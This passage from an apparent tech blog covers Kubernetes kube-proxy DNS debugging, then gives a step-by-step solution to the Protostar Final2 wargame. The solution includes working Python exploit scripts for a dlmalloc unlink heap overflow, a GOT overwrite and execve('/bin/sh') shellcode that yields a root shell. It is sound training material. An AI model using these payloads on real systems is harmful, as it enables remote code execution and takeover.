KUBE-SEP-YRPM7BEQS2YESSJL  all  --  anywhere             anywhere             statistic mode random probability 0.01923076902
KUBE-SEP-BSHQZGGNYIILL3V7  all  --  anywhere             anywhere             statistic mode random probability 0.01960784290
KUBE-SEP-XTW5FCAH2423EWAV  all  --  anywhere             anywhere             statistic mode random probability 0.02000000002
KUBE-SEP-2ETTGYCM3KLKL54Q  all  --  anywhere             anywhere             statistic mode random probability 0.02040816331
KUBE-SEP-ZUFFQWVT2EY73YVF  all  --  anywhere             anywhere             statistic mode random probability 0.02083333349
KUBE-SEP-VUNSBD5OILT2BGUX  all  --  anywhere             anywhere             statistic mode random probability 0.02127659554
KUBE-SEP-3XVS5OF4SBBHATZW  all  --  anywhere             anywhere             statistic mode random probability 0.02173913037
KUBE-SEP-IRW2YX5BEMBR3OGF  all  --  anywhere             anywhere             statistic mode random probability 0.02222222229
KUBE-SEP-6J6T3TOCBEQ5NUQ5  all  --  anywhere             anywhere             statistic mode random probability 0.02272727247
KUBE-SEP-E3FOMPW5DQK5FDIA  all  --  anywhere             anywhere             statistic mode random probability 0.02325581387
KUBE-SEP-EO4O2TBNDPU377YQ  all  --  anywhere             anywhere             statistic mode random probability 0.02380952379
KUBE-SEP-ZGRZOBXXZ2KPGNZD  all  --  anywhere             anywhere             statistic mode random probability 0.02439024393
KUBE-SEP-XLRCUOCE6XAL3TYE  all  --  anywhere             anywhere             statistic mode random probability 0.02499999991
KUBE-SEP-477YCBVB2RZ4WKUD  all  --  anywhere             anywhere             statistic mode random probability 0.02564102551
KUBE-SEP-FGVS22Q3OCM6S5VS  all  --  anywhere             anywhere             statistic mode random probability 0.02631578967
KUBE-SEP-FBHD55TKQKCEKSUO  all  --  anywhere             anywhere             statistic mode random probability 0.02702702722
KUBE-SEP-ULRGL5A7XKWV3HB6  all  --  anywhere             anywhere             statistic mode random probability 0.02777777798
KUBE-SEP-HO6T2NOJNNMVWDPW  all  --  anywhere             anywhere             statistic mode random probability 0.02857142873
KUBE-SEP-PV23DIU55F5LDJIX  all  --  anywhere             anywhere             statistic mode random probability 0.02941176482
KUBE-SEP-6PL2LOTBN64MN2IF  all  --  anywhere             anywhere             statistic mode random probability 0.03030303027
KUBE-SEP-3G3LTNLLVZWE57GZ  all  --  anywhere             anywhere             statistic mode random probability 0.03125000000
KUBE-SEP-SNHFF6VK2KP44I7Q  all  --  anywhere             anywhere             statistic mode random probability 0.03225806449
KUBE-SEP-KNOCRXE7JOQ4FBTI  all  --  anywhere             anywhere             statistic mode random probability 0.03333333321
KUBE-SEP-M5NXUS47V77SM3HZ  all  --  anywhere             anywhere             statistic mode random probability 0.03448275849
KUBE-SEP-VEMFKB2E3QRFFRSG  all  --  anywhere             anywhere             statistic mode random probability 0.03571428591
KUBE-SEP-RRYDQV524YXA4GDR  all  --  anywhere             anywhere             statistic mode random probability 0.03703703685
KUBE-SEP-G65AAYF5LWFW4YBM  all  --  anywhere             anywhere             statistic mode random probability 0.03846153850
KUBE-SEP-K4HN6ANXSPKA7JGZ  all  --  anywhere             anywhere             statistic mode random probability 0.04000000004
KUBE-SEP-72YXYSKWHCML6KJJ  all  --  anywhere             anywhere             statistic mode random probability 0.04166666651
KUBE-SEP-YCD5TFDQM4ELQ5WX  all  --  anywhere             anywhere             statistic mode random probability 0.04347826075
KUBE-SEP-U7N4W7N5OKDP5PNC  all  --  anywhere             anywhere             statistic mode random probability 0.04545454541
KUBE-SEP-ACPRKJJSJ73NAQNV  all  --  anywhere             anywhere             statistic mode random probability 0.04761904757
KUBE-SEP-HPAV4MFMKCM43BC2  all  --  anywhere             anywhere             statistic mode random probability 0.04999999981
KUBE-SEP-VXO5CPBPAES2GS3A  all  --  anywhere             anywhere             statistic mode random probability 0.05263157887
KUBE-SEP-LJ3HM5QDYEB4ICUB  all  --  anywhere             anywhere             statistic mode random probability 0.05555555550
KUBE-SEP-W6VORIPTN7FDPIMU  all  --  anywhere             anywhere             statistic mode random probability 0.05882352963
KUBE-SEP-A5SGQE4VKXUT2NEC  all  --  anywhere             anywhere             statistic mode random probability 0.06250000000
KUBE-SEP-4LCLRUWZUF2DDGKK  all  --  anywhere             anywhere             statistic mode random probability 0.06666666688
KUBE-SEP-K7NZ33CKVQDPMIET  all  --  anywhere             anywhere             statistic mode random probability 0.07142857136
KUBE-SEP-76ISGBIKEK2QPYDL  all  --  anywhere             anywhere             statistic mode random probability 0.07692307699
KUBE-SEP-3S5ELV7JJCII2KNO  all  --  anywhere             anywhere             statistic mode random probability 0.08333333349
KUBE-SEP-THLYLIADKU5Z5I32  all  --  anywhere             anywhere             statistic mode random probability 0.09090909082
KUBE-SEP-T7P5MBD5MAWH2XB5  all  --  anywhere             anywhere             statistic mode random probability 0.10000000009
KUBE-SEP-WQ6DVZHCVUTU5QJS  all  --  anywhere             anywhere             statistic mode random probability 0.11111111101
KUBE-SEP-5RVGOA4UDKOKKI7O  all  --  anywhere             anywhere             statistic mode random probability 0.12500000000
KUBE-SEP-VSXQV2AZ43RZQSL7  all  --  anywhere             anywhere             statistic mode random probability 0.14285714272
KUBE-SEP-RVDWX7YLRKCSUDII  all  --  anywhere             anywhere             statistic mode random probability 0.16666666651
KUBE-SEP-OECSAM56W6JQA562  all  --  anywhere             anywhere             statistic mode random probability 0.20000000019
KUBE-SEP-HY76TWODHVCVLG5Y  all  --  anywhere             anywhere             statistic mode random probability 0.25000000000
KUBE-SEP-3UNVKH34LEKZ2P5K  all  --  anywhere             anywhere             statistic mode random probability 0.33333333349
KUBE-SEP-TDCXKWGVKJJ22VHB  all  --  anywhere             anywhere             statistic mode random probability 0.50000000000
KUBE-SEP-Z7ZOTGJIY44EKMWW  all  --  anywhere             anywhere

# List the rules of two random chains above to see the DNAT'ed Pod IP
root@toolbox:~# iptables -L KUBE-SEP-RVDWX7YLRKCSUDII -t nat
Chain KUBE-SEP-RVDWX7YLRKCSUDII (1 references)
target     prot opt source               destination
KUBE-MARK-MASQ  all  --  10.179.94.16         anywhere
DNAT       tcp  --  anywhere             anywhere             tcp to::0 persistent:0 persistent

root@toolbox:~# iptables -L KUBE-SEP-6PL2LOTBN64MN2IF -t nat
Chain KUBE-SEP-6PL2LOTBN64MN2IF (1 references)
target     prot opt source               destination
KUBE-MARK-MASQ  all  --  10.179.45.66         anywhere
DNAT       tcp  --  anywhere             anywhere             tcp to::0 persistent:0 persistent

These final rules are the ones that actually replace the destination Cluster IP of 10.178.64.10 with a randomly chosen kube-dns Pod IP. The random selection is implemented by the rules in the KUBE-SVC-ERIFXISQEP7F7OF4 chain which have statistic mode random probability p. Rules are matched top down. So the first rule with target KUBE-SEP-BMNCBK7ROA3MA6UU has a probability of 0.01538461540 of being picked. The second rule with target KUBE-SEP-GYUBQUCI6VR6AER2 has a probability of 0.01562500000 of being picked. But this 0.01562500000 is applied to the probability that the first rule didn’t match. So its overall probability is (1 - 0.01538461540) * 0.01562500000 ~= 0.01538461540. Applying this calculation to the other rules, you can see each rule has a probability of 0.01538461540 or 1/n in being selected where n = 65 is the total number of kube-dns Pods in this case. This algorithm is actually a variation of reservoir sampling.

Confirming the Root Cause

At this point I strongly suspected the iptables rules were stale and routing packets to kube-dns Pod IPs that no longer exist. In order to confirm this I wanted to find an actual DNAT’ed IP that didn’t correspond to any actual kube-dns Pod. There were 65 rules in the KUBE-SVC-ERIFXISQEP7F7OF4 chain, but I expected 77 because that was the number of kube-dns Pods.

kubectl --context my-gke-cluster -n kube-system get endpoints kube-dns -o json | jq -r .subsets[0].addresses | jq length
77

On nodes without DNS issues, I saw the correct number of rules.

root@healthy-gke-node:~# iptables -L KUBE-SVC-ERIFXISQEP7F7OF4 -t nat | wc -l
79 [two extra lines of headers]

I saw this Pod IP when inspecting a randomly chosen rule on my-gke-node.

root@toolbox:~# iptables -L KUBE-SEP-RVDWX7YLRKCSUDII -t nat
Chain KUBE-SEP-RVDWX7YLRKCSUDII (1 references)
target     prot opt source               destination
KUBE-MARK-MASQ  all  --  10.179.94.16         anywhere
DNAT       tcp  --  anywhere             anywhere             tcp to::0 persistent:0 persistent

No kube-dns Pod existed with this IP.

kubectl --context my-gke-cluster -n kube-system get pods --selector k8s-app=kube-dns -o wide | grep 10.179.94.16
[no output]

This confirmed kube-proxy wasn’t updating the iptables rules for kube-dns. Why? The kube-proxy logs on the node showed these ongoing occurring errors.

dxia@my-gke-node ~ $ tail -f /var/log/kube-proxy.log
E0126 20:40:24.739255       1 reflector.go:153] k8s.io/client-go/informers/factory.go:135: Failed to list *v1.Service: an error on the server ("") has prevented the request from succeeding (get services)
E0126 20:40:24.739611       1 reflector.go:153] k8s.io/client-go/informers/factory.go:135: Failed to list *v1.Endpoints: an error on the server ("") has prevented the request from succeeding (get endpoints)
E0126 20:40:34.742869       1 reflector.go:153] k8s.io/client-go/informers/factory.go:135: Failed to list *v1.Service: an error on the server ("") has prevented the request from succeeding (get services)

The Speculative Fix

I think these kube-proxy errors are caused by this underlying K8s bug, but I’m not sure.

we found that after the problem occurred all subsequent requests were still send on the same connection. It seems that although the client will resend the request to apiserver, but the underlay http2 library still maintains the old connection so all subsequent requests are still send on this connection and received the same error use of closed connection.

So the question is why http2 still maintains an already closed connection? Maybe the connection it maintained is indeed alive but some intermediate connections are closed unexpectedly?

— https://github.com/kubernetes/kubernetes/issues/87615#issuecomment-596312532

The bug in that issue is fixed in K8s 1.19 and 1.20.

If you’re using GKE and Google Cloud Monitoring, this log query will show which nodes’ kube-proxy Pods can’t get updated Service and Endpoint data from the K8s API.

resource.type="k8s_node"
resource.labels.project_id="[YOUR-PROJECT]"
logName="projects/[YOUR-PROJECT]/logs/kube-proxy"
jsonPayload.message:"Failed to list "
severity=ERROR

My Hints and Solutions to the First Three Levels of Over the Wire Vortex

2020-12-25T20:21:28-05:00

I recently found more wargames at overthewire.org. Here are my hints and solutions for the first three levels of Vortex. The levels are cumulative. We have to beat the previous level in order to access the next.

Vortex Level 0 -> Level 1

Hint 1: how much data

My Solution to Exploit Exercises Protostar Final2 Level

2020-11-01T17:46:32-05:00

This is an explanation of Protostar level Final2. I wrote a solution in April without an explanation. I read it last night and had to spend half a day to understand it again. So next time I’ll write the explanation while it’s still fresh in my head.

The level’s description is

Remote heap level :)
Core files will be in /tmp.
This level is at /opt/protostar/bin/final2

This is the source code.

#include "../common/common.c"
#include "../common/malloc.c"

#define NAME "final2"
#define UID 0
#define GID 0
#define PORT 2993

#define REQSZ 128

void check_path(char *buf)
{
  char *start;
  char *p;
  int l;

  /*
  * Work out old software bug
  */

  p = rindex(buf, '/');
  l = strlen(p);
  if(p) {
      start = strstr(buf, "ROOT");
      if(start) {
          while(*start != '/') start--;
          memmove(start, p, l);
          printf("moving from %p to %p (exploit: %s / %d)\n", p, start, start < buf ?
          "yes" : "no", start - buf);
      }
  }
}

int get_requests(int fd)
{
  char *buf;
  char *destroylist[256];
  int dll;
  int i;

  dll = 0;
  while(1) {
      if(dll >= 255) break;

      buf = calloc(REQSZ, 1);
      destroylist[dll] = buf; /* Line is missing in original source. gdb disassemble will show it. */
      if(read(fd, buf, REQSZ) != REQSZ) break;

      if(strncmp(buf, "FSRD", 4) != 0) break;

      check_path(buf + 4);

      dll++;
  }

  for(i = 0; i < dll; i++) {
                write(fd, "Process OK\n", strlen("Process OK\n"));
      free(destroylist[i]);
  }
}

int main(int argc, char **argv, char **envp)
{
  int fd;
  char *username;

  /* Run the process as a daemon */
  background_process(NAME, UID, GID);

  /* Wait for socket activity and return */
  fd = serve_forever(PORT);

  /* Set the client socket to STDIN, STDOUT, and STDERR */
  set_io(fd);

  get_requests(fd);

}

Overview of source code

The first line of the description coupled with the fact the code listens on port 2993 means we’ll have to send a TCP packet that exploits a heap related vulnerability. main() is pretty simple. It runs the final2 binary in the background as root and processes requests with get_requests(). get_requests() declares an array of 256 char pointers and reads input strings into it. If any request size isn’t REQSZ or 128 bytes, the function breaks out of the while(1) loop. Any request payload that doesn’t start with FSRD also breaks out of the loop. The check_path() function is then called and dll is incremented. A for-loop writes “Process OK” to stdout and frees each string buffer starting with the oldest.

check_path() stores a pointer to buf’s right-most / in p. l is the length of the string starting from p. If p is greater than 0, start points to the part of buf that has "ROOT". If "ROOT" is a substring in buf, the while loop decrements start until it finds a /. Then memmove() moves l bytes of the string starting at p to start.

A TCP packet with the string FSRD/ROOT/AAAA will cause p to point to the second /. So p as a string is /AAAA. l is 5. start initially points to the R in ROOT and later is decremented to point to the first /. memmove() changes the string to FSRD/AAAA/AAAA.

Notice that start-- doesn’t check the bounds of the string passed in by buf. It will keep scanning leftward until it finds some /. So memmove() can write to memory outside of the current string.

General Exploit Strategy

We know we’ll need to exploit the free() call which in this series of exercises uses the vulnerable dlmalloc unlink() macro. In a previous post, I showed how this exploit manipulates heap memory to redirect code execution. We’ll need to inject shellcode via the request payloads. Our request payloads also need to corrupt heap memory in a way that will trick dlmalloc into redirecting code to the shellcode.

Exploiting `memmove()`

Let’s craft a first payload that will allow the second payload to overwrite heap memory before the start of the second string. FSRDAAAA...AAAA/AAAA should work. The second payload can be FSRDROOTAAA...AAAA/BBBB. After the second call to check_path(), the heap memory of the first string should be FSRDAAAA...AAAA/BBBB. Let’s confirm this with a Python script and gdb. We’ll set a breakpoint right after the call to check_path() and send these two strings.

We save the following contents to a file named test.py.

#!/usr/bin/env python

import socket
import sys

HOST = sys.argv[1]
PORT = 2993
REQSZ = 128

# Establish TCP connection
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

payload1 = 'FSRD' + 'A' * (REQSZ - 4 - 5) + '/' + 'AAAA'  # 'FSRDAAAA.../AAAA'
s.sendall(bytes(payload1, 'ascii'))

payload2 = 'FSRD' + 'ROOT' + 'A' * (REQSZ - 8 - 5) + '/' + 'BBBB'  # 'FSRDROOTAAAA.../BBBB'
s.sendall(bytes(payload2, 'ascii'))

# Terminate session by sending a payload that causes get_requests() to return
s.sendall(bytes('AAAA', 'ascii'))

data = s.recv(1024)
print(data.decode('ascii'))  # print the confirmation

s.close()

I’m running the Protostar VM on Virtualbox on a Macbook. Set the network settings for the VM to Host-only Adapter. Once the VM starts, use the Virtualbox “Show” button to get a terminal to the VM. Login as user with password user. Run ip addr show to find the VM’s local IP address. Mine is 192.168.99.107. I then close the Virtualbox terminal because I like to use iTerm. I SSH with iTerm into the VM as root with password godmode. We need to be root in order to attach gdb to a running process.

ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" root@192.168.99.107

You can see final2 is already running. We get the PID.

root@protostar:/# ps aux | grep final2
root      1495  0.0  0.2   1544   284 ?        Ss   10:44   0:00 /opt/protostar/bin/final2

Now attach gdb to it. Since the program forks a new child process to handle requests, we set follow-fork-mode child to make gdb follow the child process instead of the parent. set detach-on-fork off makes gdb hold control of both parent and child (I’m not sure if this is necessary). The other two gdb settings are my personal preferences.

root@protostar:/# gdb /opt/protostar/bin/final2 -p 1495

GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/final2...done.
Attaching to program: /opt/protostar/bin/final2, process 1495
Reading symbols from /lib/libc.so.6...Reading symbols from /usr/lib/debug/lib/libc-2.11.2.so...done.
(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...Reading symbols from /usr/lib/debug/lib/ld-2.11.2.so...done.
(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
accept () at ../sysdeps/unix/sysv/linux/i386/socket.S:64
64    ../sysdeps/unix/sysv/linux/i386/socket.S: No such file or directory.
  in ../sysdeps/unix/sysv/linux/i386/socket.S

(gdb) set follow-fork-mode child
(gdb) set detach-on-fork off
(gdb) set disassembly-flavor intel
(gdb) set pagination off

Disassemble get_requests() to find where check_path() returns.

(gdb) disassemble get_requests
Dump of assembler code for function get_requests:
0x0804bd47 <get_requests+0>: push   ebp
0x0804bd48 <get_requests+1>: mov    ebp,esp
...
0x0804bdce <get_requests+135>:   mov    DWORD PTR [esp],eax
0x0804bdd1 <get_requests+138>:   call   0x804bcd0 <check_path>
0x0804bdd6 <get_requests+143>:   jmp    0x804bd57 <get_requests+16>
0x0804bddb <get_requests+148>:   nop
...
0x0804be25 <get_requests+222>:   ret
End of assembler dump.

(gdb) break *get_requests+143
Breakpoint 1 at 0x804bdd6: file final2/final2.c, line 51.
(gdb) c
Continuing.

Now run our Python script in another terminal to send the strings.

python test.py 192.168.99.107

Our gdb terminal will show the following.

[New process 2322]
[Switching to process 2322]

Breakpoint 1, get_requests (fd=4) at final2/final2.c:51
51    final2/final2.c: No such file or directory.
  in final2/final2.c
Current language:  auto
The current source language is "auto; currently c".

Print buf to show the address it points to. Then examine the first 40 DWORDs in hexadecimal starting at address 0x804e000 (0x804e008 - 0x8 so we can see the first heap chunk’s metadata in the previous 8 bytes). We can see its FSRD (0x44525346) followed by lots of As (0x41s) and ends in /AAAA.

(gdb) p buf
$1 = 0x804e008 "FSRD", 'A' <repeats 119 times>, "/AAAA"

(gdb) x/40wx 0x804e000
0x804e000: 0x00000000  0x00000089  0x44525346  0x41414141
0x804e010: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e020: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e030: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e040: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e050: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e060: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e070: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e080: 0x2f414141  0x41414141  0x00000000  0x00000f79
0x804e090: 0x00000000  0x00000000  0x00000000  0x00000000

We continue and examine the memory of the first chunk again. We expect the memory at address 0x804e084 to be BBBB or 0x42424242 which it is.

(gdb) c
Continuing.

Breakpoint 1, get_requests (fd=4) at final2/final2.c:51
51    in final2/final2.c

(gdb) x/40wx 0x804e000
0x804e000: 0x00000000  0x00000089  0x44525346  0x41414141
0x804e010: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e020: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e030: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e040: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e050: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e060: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e070: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e080: 0x2f414141  0x42424242  0x00000000  0x00000089
0x804e090: 0x44525346  0x544f4f52  0x41414141  0x41414141

Exploiting `free()`

With the ability to overwrite bytes following a strategically placed / character in the previous heap chunk, we can perform a classic heap overflow exploit using the unlink() technique. We can’t overwrite the first chunk’s heap metadata because there’s no way to insert a / before it. So we target the second chunk’s heap metadata. I’m now going to rehash some of the dlmalloc algorithm explained in my previous post because it can be a little confusing.

When the first chunk is freed, unlink() will run on the second chunk if the second chunk has already been freed. dlmalloc determines if the second chunk is freed by checking the third chunk’s PREV_INUSE bit which is the lowest bit of the second byte of the chunk. In order to find the start of the third chunk, dlmalloc adds the value of the chunk’s second DWORD bitmasked with 0x1 (i.e. ignoring the lowest bit) to the chunk’s starting address. So in the above memory dump, the start of the second chunk is 0x00000089 &0x1 + 0x804e000 = 0x804e088. Likewise, the start of the third chunk is 0x00000089 &0x1 + 0x804e088 = 0x804e110. So we have to figure out a way to write arbitrary bytes to the third chunk.

But we’re already writing arbitrary bytes to the second chunk’s metadata. Is there way to make dlmalloc think the third chunk starts somewhere in memory where we’re already writing bytes for the second chunk? Nothing in dlmalloc checks the third chunk is actually right after the second. dlmalloc just blindly performs an addition on two numbers. One of these numbers is the second chunk’s size which we can set via the memmove() bug. Let’s make dlmalloc think the third chunk is actually four bytes before the start of the second chunk. The second chunk is at 0x804e088 so the “virtual” third chunk will be at 0x804e084. What number added to 0x804e088 equals 0x804e084? -4. [Integer overflow] means adding 0xfffffffc is the same as adding -4 (0x804e088 + 0xfffffffc = 0x804e084). So the second chunk’s second DWORD representing its size must be 0xfffffffc, and the PREV_INUSE bit of the third chunk must be 0. 0xfffffffc 0xfffffffc will work.

Once we fool dlmalloc into thinking the second chunk is already freed, dlmalloc will unlink() it. So we need to craft values for the second chunk’s forwards and backwards pointers such that unlink() will redirect code execution to another region of memory where we can insert shellcode.

In the Heap3 level we overwrote the address of a function in the procedure linkage table (PLT) with the address of shellcode. We can do the same here. Since we send two packets, dll will be 2. The for-loop will call write() twice. The first free() will overwrite write()’s address in the PLT. Let’s find the PLT address containing the address of write(). We disassemble get_requests, examine the address 0x8048dfc as an instruction to get the address in the global offset table (GOT) that points to the dynamically linked library containing the actual write()0 function. We want to overwrite the contents of 0x804d41c with the address of our shellcode. Since unlink() adds 12 to the forwards pointer, we need to make the forward pointer 0x804d41c - 12.

disassemble get_requests

Dump of assembler code for function get_requests:
...
0x0804be01 <get_requests+186>:   call   0x8048dfc <write@plt>
...
End of assembler dump.

(gdb) x/i 0x8048dfc
0x8048dfc <write@plt>:  jmp    DWORD PTR ds:0x804d41c

(gdb) x/x 0x804d41c
0x804d41c <_GLOBAL_OFFSET_TABLE_+64>:    0xb7f53c70

Crafting Malicious Packets

Where should we put our shellcode? We can include it in our first request. The first two DWORDs will be clobbered by dlmalloc when it sets the first chunk’s forwards and backwards pointers. The first word needs to be used for FSRD anyways. So let’s put shellcode at 0x804e010. This address will be our backwards pointer.

To summarize, this is how the packets should look so far.

The first payload must start with FSRD. Then we need four bytes of filler bytes AAAA followed by shellcode (TBD). The last byte must be / for memmove(). The payload must be 128 bytes. The spaces in the payload visualization below are just for readability. They shouldn’t be in the actual payload.

FSRD AAAA <shellcode> AAAA ... AAA/

The second payload must start with FSRDROOT. Then have 0xfffffffc 0xfffffffc. Then the forward pointer 0x804d41c - 12 and backward pointer 0x804e010. The whole payload must again be 128 bytes. We can just fill with As.

FSRD ROOT 0xfffffffc 0xfffffffc 0x804d41c - 12 0x804e010 AAAA ... AAAA

Before we craft shellcode, let’s confirm the exploit will redirect code execution to the proposed shellcode address. Instead of using actual shellcode, we’ll use four bytes of 0xcc which is a one-byte x86 instruction called INT3 that causes the processor to halt the process for any attached debuggers. If we hit this opcode, our attached gdb debugger receive the SIGTRAP signal. Let’s test with the below Python script.

import socket
import struct
import sys
import telnetlib


REQSZ = 128
HOST = sys.argv[1]
PORT = 2993

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

shellcode = b'\xcc\xcc\xcc\xcc'


ba = bytearray(bytes('FSRDAAAA', 'ascii'))
ba.extend(shellcode)
ba = ba.ljust(REQSZ, b'\x41')
ba[-1] = ord('/')
s.sendall(ba)

ba = bytearray(bytes('FSRDROOT/', 'ascii'))
# Use integer overflow to make dlmalloc think third chunk is 4 bytes before second chunk.
ba.extend(struct.pack('I', 0xfffffffc) + struct.pack('I', 0xfffffffc))
# Add forward and backward pointers
ba.extend(struct.pack('I', 0x804d41c - 12) + struct.pack('I', 0x804e010))
ba = ba.ljust(REQSZ, b'\x41')
s.sendall(ba)

t = telnetlib.Telnet()
t.sock = s
t.interact()

Attach gdb to the final2 process again.

ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" root@192.168.99.107

root@protostar:/# gdb /opt/protostar/bin/final2 -p 1495
...

(gdb) set follow-fork-mode child
Current language:  auto
The current source language is "auto; currently asm".
(gdb) set detach-on-fork off
(gdb) set disassembly-flavor intel
(gdb) set pagination off

Set a breakpoint at the call to write().

(gdb) break *get_requests+186
Breakpoint 1 at 0x804be01: file final2/final2.c, line 54.
(gdb) c
Continuing.

Run the Python script in another terminal. Hit enter to send a third packet that’s less than 128 bytes to break out of the while(1) loop.

python final2.py 192.168.99.107
<enter>
Process OK

The gdb session should hit the breakpoint at write().

[New process 2622]
[Switching to process 2622]

Breakpoint 1, 0x0804be01 in get_requests (fd=4) at final2/final2.c:54
54    final2/final2.c: No such file or directory.
  in final2/final2.c
Current language:  auto
The current source language is "auto; currently c".

Examine the first 80 DWORDs. Continue and examine again.

(gdb) x/80wx 0x804e000
0x804e000: 0x00000000  0x00000089  0x44525346  0x41414141
0x804e010: 0xcccccccc  0x41414141  0x41414141  0x41414141
0x804e020: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e030: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e040: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e050: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e060: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e070: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e080: 0x41414141  0x2f414141  0xfffffffc  0xfffffffc
0x804e090: 0x0804d410  0x0804e014  0x41414141  0x41414141
0x804e0a0: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e0b0: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e0c0: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e0d0: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e0e0: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e0f0: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e100: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e110: 0x00000000  0x00000089  0x0000000a  0x00000000
0x804e120: 0x00000000  0x00000000  0x00000000  0x00000000
0x804e130: 0x00000000  0x00000000  0x00000000  0x00000000

(gdb) c
Continuing.
Breakpoint 1, 0x0804be01 in get_requests (fd=4) at final2/final2.c:54
54    in final2/final2.c

(gdb) x/80wx 0x804e000
0x804e000: 0x00000000  0x00000085  0x0804d534  0x0804d534
0x804e010: 0xcccccccc  0x41414141  0x0804d410  0x41414141
0x804e020: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e030: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e040: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e050: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e060: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e070: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e080: 0x41414141  0x00000084  0xfffffffc  0xfffffffc
0x804e090: 0x0804d410  0x0804e014  0x41414141  0x41414141
0x804e0a0: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e0b0: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e0c0: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e0d0: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e0e0: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e0f0: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e100: 0x41414141  0x41414141  0x41414141  0x41414141
0x804e110: 0x00000000  0x00000089  0x0000000a  0x00000000
0x804e120: 0x00000000  0x00000000  0x00000000  0x00000000
0x804e130: 0x00000000  0x00000000  0x00000000  0x00000000

Memory at 0x804e008 and 0x804e00c have been changed (to addresses before the heap. I guess because it’s some special value for the first chunk). Our INT3 instruction is at 0x804e010. Let’s look at the GOT entry for write().

(gdb) x/i 0x8048dfc
0x8048dfc <write@plt>:  jmp    DWORD PTR ds:0x804d41c

(gdb) x/x 0x804d41c
0x804d41c <_GLOBAL_OFFSET_TABLE_+64>:    0x0804e014

Its value is the location of our INT3. This means the next call to write() will redirect code execution to our INT3 which should cause gdb to break again.

(gdb) c
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x0804e011 in ?? ()

It worked!

Crafting the Shellcode

So now all we have to is insert some real shellcode that’ll own the system. Since final2 is running as root, let’s make the process start a shell. This will allow us send arbitrary commands over TCP that get executed as root, i.e. remote code execution. Shellstorm has a great library of shellcodes. Let’s use “Linux/x86 - execve(/bin/sh) - 28 bytes”. But we have a problem. unlink() overwrites the memory at 0x804e018 (it’ll always overwrite four bytes of memory eight bytes ahead of whatever address we pick), and no useful shellcode is short enough to fit into eight bytes. What can we do?

If the shellcode could only jump past 0x804e018 to 0x804e01c where we have a huge piece of contiguous memory. Luckily the jmp instruction (\xeb) does exactly this. Its argument is how many bytes to jump over. So our shellcode can start with 0xeb 0x0a which moves the instruction pointer 10 bytes forward. We fill in the middle 10 bytes with nops (0x90). Our final script will be this.

import socket
import struct
import sys
import telnetlib


REQSZ = 128
HOST = sys.argv[1]
PORT = 2993

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

# Two bytes for "jmp 0x0c", two bytes of nop padding to fill out the word,
# eight more nop bytes (second nop DWORD will be clobbered by unlink()),
# then actual shellcode from http://shell-storm.org/shellcode/files/shellcode-811.php
shellcode = b'\xeb\x0a\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90' \
            b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69' \
            b'\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31' \
            b'\xc0\x40\xcd\x80'

# These eight bytes will be overwritten by unlink().
ba = bytearray(bytes('FSRDAAAA', 'ascii'))
ba.extend(shellcode)
ba = ba.ljust(REQSZ, b'\x41')
# Set the last byte to a '/' for memmove().
ba[-1] = ord('/')
s.sendall(ba)

ba = bytearray(bytes('FSRDROOT/', 'ascii'))
# Use integer overflow to make dlmalloc think third chunk is four bytes before second chunk.
ba.extend(struct.pack('I', 0xfffffffc) + struct.pack('I', 0xfffffffc))
# Add forward and backward pointers
ba.extend(struct.pack('I', 0x804d41c - 12) + struct.pack('I', 0x804e010))
ba = ba.ljust(REQSZ, b'\x41')
s.sendall(ba)

